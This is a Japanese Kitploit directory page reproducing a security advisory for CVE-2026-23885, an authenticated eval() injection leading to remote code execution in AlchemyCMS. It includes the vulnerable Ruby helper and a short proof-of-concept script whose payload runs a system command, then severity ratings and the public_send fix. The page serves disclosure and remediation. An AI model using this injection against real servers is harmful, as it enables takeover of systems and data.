Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-23885 — CVE-2026-23885の概念実証エクスプロイト。AlchemyCMSにおけるeval()インジェクションを介した認証済みRCEであり、技術的分析と修復ガイダンスを含む。 | Kitploit
ツール/GitHubGitHub/thedeepopc/cve-2026-23885
脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubthedeepopc/cve-2026-23885

CVE-2026-23885

CVE-2026-23885の概念実証エクスプロイト。AlchemyCMSにおけるeval()インジェクションを介した認証済みRCEであり、技術的分析と修復ガイダンスを含む。

リポジトリを見る
17ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

セキュリティアドバイザリ: CVE-2026-23885

AlchemyCMSにおける認証済みリモートコード実行(RCE)

1. エグゼクティブサマリー

AlchemyCMSフレームワークにおいて、動的評価コードにおけるディレクティブの不適切な無害化(CWE-95) に関わる重大なセキュリティ脆弱性が発見されました。この脆弱性により、管理者権限を持つ認証済みユーザーが、eval() インジェクションシンクを介して、ホストサーバー上で任意のRubyコードおよびシステムコマンドを実行できる可能性があります。


2. 技術的脆弱性分析

脆弱なコンポーネント

  • ファイル: app/helpers/alchemy/resources_helper.rb
  • メソッド: Alchemy::ResourcesHelper#resource_url_proxy
  • リスクレベル: 中/高(認証済みRCE)

根本原因

このヘルパーメソッドは、resource_handler オブジェクトの engine_name 属性を安全でない方法で処理します。この属性は、事前のサニタイズや検証なしに、Rubyの 関数に直接渡されます。

eval()
root@kitploit:~
def resource_url_proxy(resource_handler)
  if resource_handler.in_engine?
    eval(resource_handler.engine_name) # rubocop:disable Security/Eval
  else
    main_app
  end
end

# rubocop:disable Security/Eval ディレクティブの存在は、eval() の使用に伴うセキュリティ上の影響が認識されていたものの、実装時に回避されたことを裏付けています。

3. 概念実証(PoC)

攻撃ベクトル

この脆弱性は、リソースベースのビュー(例: Sites や Languages)をレンダリングする際に、AlchemyCMSの管理インターフェース内で発動します。攻撃者がモジュール設定または基盤となるリソースデータを操作できる場合、コード実行を達成できます。

スタンドアロン悪用スクリプト

以下のスクリプトは、脆弱なヘルパー環境をシミュレートすることで、任意のコード実行を実証します。

Ruby

root@kitploit:~
require 'ostruct'

def resource_url_proxy(resource_handler)
  if resource_handler.engine_name && !resource_handler.engine_name.empty?
    eval(resource_handler.engine_name)
  end
end

# ペイロード: システムの 'id' コマンドを実行し、証拠ファイルを作成
payload = "system('id > /tmp/rce_verified'); 'main_app'"
handler = OpenStruct.new(engine_name: payload)

resource_url_proxy(handler)

実行の証拠

実行時、システムコマンドが処理され、攻撃者にサーバー環境へのアクセスを許可します。

root@kitploit:~
<img src="https://assets.kitploit.com/production/public/readmes/51835/35f164da4eceecf2d265c28ca0f65f0ea41ac77f50b63e61869f6566c6f62ccf/3e25178aacaaddc49f4cc09c5e7adad59bfb6fe9b724d0e63a2d44ee16af6cc2-display-v1.webp" width="1200px" alt="RCEターミナル証拠"> 

## 4. 影響と深刻度
- **機密性:** 高。アプリケーションデータおよび環境シークレットへの完全なアクセス。
- **完全性:** 高。ファイルおよびデータベースレコードを変更する能力。
- **可用性:** 高。システム全体の破壊の可能性。

- **CVE ID:** CVE-2026-23885

## 5. 修復策
この脆弱性は、以下のパッチ適用済みバージョンで対処されています。

- **7.4.12**
- **8.0.3**

この修正には、`eval()` 呼び出しを `public_send()` に置き換え、リクエストを意図したエンジンプロキシに安全にルーティングすることが含まれます。

Ruby

```ruby
main_app.public_send(resource_handler.engine_name) if resource_handler.engine_name.present?
脆弱性発見: 独立したセキュリティ監査

CVE参照: CVE-2026-23885

  • CVEリスト: CVE.orgのCVE-2026-23885
  • 脆弱性分析: Tenable CVE-2026-23885データベース
  • AlchemyCMSセキュリティポリシー: セキュリティガイドライン
ツールをダウンロード